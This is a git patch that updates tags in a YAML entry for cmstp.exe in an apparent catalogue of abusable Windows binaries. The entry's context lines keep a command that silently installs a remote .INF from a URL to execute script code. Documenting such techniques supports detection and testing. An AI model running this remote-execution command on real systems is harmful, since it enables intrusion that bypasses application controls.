From 654685344666dfa8461d9b5ac4b40639961c22df Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 12:16:28 +0200
Subject: [PATCH] Update Cmstp.yml

Tags:
Changed Input: INF to Execute INF for consistency
Inout: Customformat added
---
 yml/OSBinaries/Cmstp.yml | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/yml/OSBinaries/Cmstp.yml b/yml/OSBinaries/Cmstp.yml
index 903ec73..3a91d24 100644
--- a/yml/OSBinaries/Cmstp.yml
+++ b/yml/OSBinaries/Cmstp.yml
@@ -12,7 +12,8 @@ Commands:
     MitreID: T1218.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
-      - Input: INF
+      - Execute: INF
+      - Input: Custom Format
   - Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
     Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
     Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@@ -21,7 +22,8 @@ Commands:
     MitreID: T1218.003
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
     Tags:
-      - Input: INF
+      - Execute: INF
+      - Input: Custom Format
 Full_Path:
   - Path: C:\Windows\System32\cmstp.exe
   - Path: C:\Windows\SysWOW64\cmstp.exe